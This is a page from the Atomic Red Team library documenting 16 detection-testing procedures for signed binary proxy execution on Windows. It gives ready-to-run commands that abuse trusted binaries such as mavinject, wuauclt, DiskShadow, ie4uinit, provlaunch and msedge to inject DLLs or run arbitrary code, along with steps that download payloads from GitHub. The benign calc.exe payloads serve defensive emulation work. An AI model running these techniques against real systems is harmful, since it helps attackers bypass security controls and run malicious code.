Skip to content
Atomic Red Team
atomics
T1218

T1218 - Signed Binary Proxy Execution

Description from ATT&CK (opens in a new tab)

Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.(Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.

Similarly, on Linux systems adversaries may abuse trusted binaries such as split to proxy execution of malicious commands.(Citation: split man page)(Citation: GTFO split)

Atomic Tests


Atomic Test #1 - mavinject - Inject DLL into running process

Injects arbitrary DLL into running process specified by process ID. Requires Windows 10.

Supported Platforms: Windows

auto_generated_guid: c426dacf-575d-4937-8611-a148a86a5e61

Inputs:

NameDescriptionTypeDefault Value
process_idPID of process receiving injectionstring1000
dll_payloadDLL to injectpathPathToAtomicsFolder\T1218\src\x64\T1218.dll

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

mavinject.exe #{process_id} /INJECTRUNNING "#{dll_payload}"

Dependencies: Run with powershell!

Description: T1218.dll must exist on disk at specified location (#{dll_payload})
Check Prereq Commands:
if (Test-Path "#{dll_payload}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path "#{dll_payload}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}"


Atomic Test #2 - Register-CimProvider - Execute evil dll

Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB

Supported Platforms: Windows

auto_generated_guid: ad2c17ed-f626-4061-b21e-b9804a6f3655

Inputs:

NameDescriptionTypeDefault Value
dll_payloadDLL to executepathPathToAtomicsFolder\T1218\src\Win32\T1218-2.dll

Attack Commands: Run with command_prompt!

C:\Windows\SysWow64\Register-CimProvider.exe -Path "#{dll_payload}"

Dependencies: Run with powershell!

Description: T1218-2.dll must exist on disk at specified location (#{dll_payload})
Check Prereq Commands:
if (Test-Path "#{dll_payload}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path "#{dll_payload}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}"


Atomic Test #3 - InfDefaultInstall.exe .inf Execution

Test execution of a .inf using InfDefaultInstall.exe

Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Infdefaultinstall.yml (opens in a new tab)

Supported Platforms: Windows

auto_generated_guid: 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef

Inputs:

NameDescriptionTypeDefault Value
inf_to_executeLocal location of inf filestringPathToAtomicsFolder\T1218\src\Infdefaultinstall.inf

Attack Commands: Run with command_prompt!

InfDefaultInstall.exe "#{inf_to_execute}"

Dependencies: Run with powershell!

Description: INF file must exist on disk at specified location (#{inf_to_execute})
Check Prereq Commands:
if (Test-Path "#{inf_to_execute}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path "#{inf_to_execute}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf" -OutFile "#{inf_to_execute}"


Atomic Test #4 - ProtocolHandler.exe Downloaded a Suspicious File

Emulates attack via documents through protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file.

Supported Platforms: Windows

auto_generated_guid: db020456-125b-4c8b-a4a7-487df8afb5a2

Inputs:

NameDescriptionTypeDefault Value
remote_urlurl to documenturlhttps://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx (opens in a new tab)

Attack Commands: Run with command_prompt!

FOR /F "tokens=2*" %a in ('reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Winword.exe" /V PATH') do set microsoft_wordpath=%b
call "%microsoft_wordpath%\protocolhandler.exe" "ms-word:nft|u|#{remote_url}"

Dependencies: Run with powershell!

Description: Microsoft Word must be installed
Check Prereq Commands:
try {
  $wdApp = New-Object -COMObject "Word.Application"
  Stop-Process -Name "winword"
  exit 0 } catch { exit 1 }
Get Prereq Commands:
Write-Host "You will need to install Microsoft Word manually to meet this requirement"


Atomic Test #5 - Microsoft.Workflow.Compiler.exe Payload Execution

Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe

Supported Platforms: Windows

auto_generated_guid: 7cbb0f26-a4c1-4f77-b180-a009aa05637e

Inputs:

NameDescriptionTypeDefault Value
xml_payloadXML to executionpathPathToAtomicsFolder\T1218\src\T1218.xml
mwcpathDefault location of Microsoft.Workflow.Compiler.exepathC:\Windows\Microsoft.NET\Framework64\v4.0.30319
mwcnameDefault name of microsoft.workflow.compiler.exepathmicrosoft.workflow.compiler.exe

Attack Commands: Run with powershell!

#{mwcpath}\#{mwcname} "#{xml_payload}" output.txt

Dependencies: Run with powershell!

Description: .Net must be installed for this test to work correctly.
Check Prereq Commands:
if (Test-Path #{mwcpath}\#{mwcname} ) {exit 0} else {exit 1}
Get Prereq Commands:
write-host ".Net must be installed for this test to work correctly."


Atomic Test #6 - Renamed Microsoft.Workflow.Compiler.exe Payload Executions

Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe

Supported Platforms: Windows

auto_generated_guid: 4cc40fd7-87b8-4b16-b2d7-57534b86b911

Inputs:

NameDescriptionTypeDefault Value
xml_payloadXML to executionpathPathToAtomicsFolder\T1218\src\T1218.xml
renamed_binaryrenamed Microsoft.Workflow.CompilerpathPathToAtomicsFolder\..\ExternalPayloads\svchost.exe
mwcpathDefault location of Microsoft.Workflow.Compiler.exepathC:\Windows\Microsoft.NET\Framework64\v4.0.30319
mwcnameDefault name of microsoft.workflow.compiler.exepathmicrosoft.workflow.compiler.exe

Attack Commands: Run with powershell!

&"#{renamed_binary}" "#{xml_payload}" output.txt

Dependencies: Run with powershell!

Description: .Net must be installed for this test to work correctly.
Check Prereq Commands:
if (Test-Path "#{renamed_binary}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Copy-Item #{mwcpath}\#{mwcname} "#{renamed_binary}" -Force


Atomic Test #7 - Invoke-ATHRemoteFXvGPUDisablementCommand base test

RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).

One of the PowerShell functions called by RemoteFXvGPUDisablement.exe is Get-VMRemoteFXPhysicalVideoAdapter, a part of the Hyper-V module. This atomic test influences RemoteFXvGPUDisablement.exe to execute custom PowerShell code by using a technique referred to as "PowerShell module load-order hijacking" where a module containing, in this case, an implementation of the Get-VMRemoteFXPhysicalVideoAdapter is loaded first by way of introducing a temporary module into the first directory listed in the %PSModulePath% environment variable or within a user-specified module directory outside of %PSModulePath%. Upon execution the temporary module is deleted.

Invoke-ATHRemoteFXvGPUDisablementCommand is used in this test to demonstrate how a PowerShell host executable can be directed to user-supplied PowerShell code without needing to supply anything at the command-line. PowerShell code execution is triggered when supplying the "Disable" argument to RemoteFXvGPUDisablement.exe.

The Invoke-ATHRemoteFXvGPUDisablementCommand function outputs all relevant execution-related artifacts.

Reference: https://github.com/redcanaryco/AtomicTestHarnesses/blob/master/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1 (opens in a new tab)

Supported Platforms: Windows

auto_generated_guid: 9ebe7901-7edf-45c0-b5c7-8366300919db

Inputs:

NameDescriptionTypeDefault Value
module_nameSpecifies a temporary module name to use. If -ModuleName is not supplied, a 16-character random temporary module name is used. A PowerShell module can have any name. Because Get-VMRemoteFXPhysicalVideoAdapter abuses module load order, a module name must be specified.stringfoo
module_pathSpecifies an alternate, non-default PowerShell module path for RemoteFXvGPUDisablement.exe. If -ModulePath is not specified, the first entry in %PSModulePath% will be used. Typically, this is %USERPROFILE%\Documents\WindowsPowerShell\Modules.string$PWD

Attack Commands: Run with powershell!

Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name} -ModulePath #{module_path}

Dependencies: Run with powershell!

Description: The AtomicTestHarnesses module must be installed and Invoke-ATHRemoteFXvGPUDisablementCommand must be exported in the module.
Check Prereq Commands:
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHRemoteFXvGPUDisablementCommand']) {exit 1} else {exit 0}
Get Prereq Commands:
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force


Atomic Test #8 - DiskShadow Command Execution

Emulates attack with a DiskShadow.exe (LOLBIN installed by default on Windows) being used to execute arbitrary commands Reference: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ (opens in a new tab)

Supported Platforms: Windows

auto_generated_guid: 0e1483ba-8f0c-425d-b8c6-42736e058eaa

Inputs:

NameDescriptionTypeDefault Value
txt_payloadtxt to executepathPathToAtomicsFolder\T1218\src\T1218.txt
dspathDefault location of DiskShadow.exepathC:\Windows\System32\diskshadow.exe

Attack Commands: Run with powershell!

#{dspath} -S #{txt_payload}

Dependencies: Run with powershell!

Description: txt file must exist on disk at specified location (#{txt_payload})
Check Prereq Commands:
if (Test-Path "#{txt_payload}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path "#{txt_payload}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/T1218.txt" -OutFile "#{txt_payload}"
Description: DiskShadow.exe must exist on disk at specified location (#{dspath})
Check Prereq Commands:
if (Test-Path #{dspath}) {exit 0} else {exit 1}
Get Prereq Commands:
echo "DiskShadow.exe not found on disk at expected location"


Atomic Test #9 - Load Arbitrary DLL via Wuauclt (Windows Update Client)

This test uses Wuauclt to load an arbitrary DLL. Upon execution with the default inputs, calculator.exe will be launched. See https://dtm.uk/wuauclt/ (opens in a new tab)

Supported Platforms: Windows

auto_generated_guid: 49fbd548-49e9-4bb7-94a6-3769613912b8

Inputs:

NameDescriptionTypeDefault Value
arbitrary_dllPath of DLL to be loadedstringPathToAtomicsFolder\T1218\bin\calc.dll

Attack Commands: Run with command_prompt!

wuauclt.exe /UpdateDeploymentProvider "#{arbitrary_dll}" /RunHandlerComServer

Cleanup Commands:

taskkill /f /im calculator.exe > nul 2>&1

Dependencies: Run with powershell!

Description: DLL to load must exist on disk as specified location (#{arbitrary_dll})
Check Prereq Commands:
if (test-path "#{arbitrary_dll}"){exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path "#{arbitrary_dll}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/bin/calc.dll?raw=true" -OutFile "#{arbitrary_dll}"


Atomic Test #10 - Lolbin Gpscript logon option

Executes logon scripts configured in Group Policy. https://lolbas-project.github.io/lolbas/Binaries/Gpscript/ (opens in a new tab) https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/ (opens in a new tab)

Supported Platforms: Windows

auto_generated_guid: 5bcda9cd-8e85-48fa-861d-b5a85d91d48c

Attack Commands: Run with command_prompt!

Gpscript /logon


Atomic Test #11 - Lolbin Gpscript startup option

Executes startup scripts configured in Group Policy https://lolbas-project.github.io/lolbas/Binaries/Gpscript/ (opens in a new tab) https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/ (opens in a new tab)

Supported Platforms: Windows

auto_generated_guid: f8da74bb-21b8-4af9-8d84-f2c8e4a220e3

Attack Commands: Run with command_prompt!

Gpscript /startup


Atomic Test #12 - Lolbas ie4uinit.exe use as proxy

Executes commands from a specially prepared ie4uinit.inf file. Poc from : https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ (opens in a new tab) Reference: https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/ (opens in a new tab)

Supported Platforms: Windows

auto_generated_guid: 13c0804e-615e-43ad-b223-2dfbacd0b0b3

Inputs:

NameDescriptionTypeDefault Value
Path_infPath to the cab filepathPathToAtomicsFolder\T1218\src\ieuinit.inf
Path_ie4uinitPath to ie4uinit.exepathc:\windows\system32\ie4uinit.exe

Attack Commands: Run with command_prompt!

copy #{Path_ie4uinit} %TEMP%\ie4uinit.exe
copy "#{Path_inf}" %TEMP%\ieuinit.inf
%TEMP%\ie4uinit.exe -BaseSettings

Cleanup Commands:

del %TEMP%\ie4uinit.exe >nul 2>&1
del %TEMP%\ieuinit.inf >nul 2>&1

Dependencies: Run with powershell!

Description: ieuinit.inf must exist on disk at specified location (#{Path_inf})
Check Prereq Commands:
if (Test-Path "#{Path_inf}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path "#{Path_inf}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/ieuinit.inf" -OutFile "#{Path_inf}"


Atomic Test #13 - LOLBAS CustomShellHost to Spawn Process

This test simulates an adversary copying customshellhost.exe and calc.exe from C:\windows\system32\ to C:\temp\, renaming calc.exe to explorer.exe. Upon execution, customshellhost.exe will spawn calc.exe. Note this will only work on Windows 10 or 11. LOLBAS (opens in a new tab) BishopFox (opens in a new tab)

Supported Platforms: Windows

auto_generated_guid: b1eeb683-90bb-4365-bbc2-2689015782fe

Inputs:

NameDescriptionTypeDefault Value
dest_pathDirectory to copy files intopathC:\test

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

if (-not (Test-Path #{dest_path})) {
New-Item -Path #{dest_path} -ItemType Directory
} else {
Write-Host "Directory #{dest_path} already exists." }
Copy-Item -Path "C:\windows\system32\customshellhost.exe" -Destination "#{dest_path}\customshellhost.exe" -Force
Copy-Item -Path "C:\windows\system32\calc.exe" -Destination "#{dest_path}\explorer.exe" -Force
#{dest_path}\customshellhost.exe

Cleanup Commands:

Remove-Item -Path #{dest_path} -Recurse -Force


Atomic Test #14 - Provlaunch.exe Executes Arbitrary Command via Registry Key

Provlaunch.exe executes a command defined in the Registry. This test will create the necessary registry keys and values, then run provlaunch.exe to execute an arbitrary command.

Supported Platforms: Windows

auto_generated_guid: ab76e34f-28bf-441f-a39c-8db4835b89cc

Attack Commands: Run with command_prompt!

reg.exe add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1 /v altitude /t REG_DWORD /d 0
reg add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1\dummy2 /v Commandline /d calc.exe
c:\windows\system32\provlaunch.exe LOLBin


Atomic Test #15 - LOLBAS Msedge to Spawn Process

Executes a process under a trusted Microsoft signed binary,mseddge. This test will spawn "calc.exe" as a child process of msedge.exe

Supported Platforms: Windows

auto_generated_guid: e5eedaed-ad42-4c1e-8783-19529738a349

Attack Commands: Run with powershell!

$edgePath64 = "C:\Program Files\Microsoft\Edge\Application\msedge.exe"
if (Test-Path $edgePath64) {
    $edgePath = $edgePath64
} else {
    # Check 32-bit Edge installation path
    $edgePath32 = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
    if (Test-Path $edgePath32) {
        $edgePath = $edgePath32
    } else {
        exit 1
    }
}
& $edgePath --disable-gpu-sandbox --gpu-launcher="C:\\Windows\\System32\\calc.exe &&"
sleep 5
taskkill -f -im msedge.exe
taskkill -f -im calc.exe
taskkill -f -im win32calc.exe


Atomic Test #16 - System Binary Proxy Execution - Wlrmdr Lolbin

Use wlrmdr(Windows Logon Reminder executable) as a proxy binary to evade defensive countermeasures

Supported Platforms: Windows

auto_generated_guid: 7816c252-b728-4ea6-a683-bd9441ca0b71

Inputs:

NameDescriptionTypeDefault Value
payload_pathPath to the executableStringC:\Windows\System32\calc.exe

Attack Commands: Run with powershell!

wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u "#{payload_path}"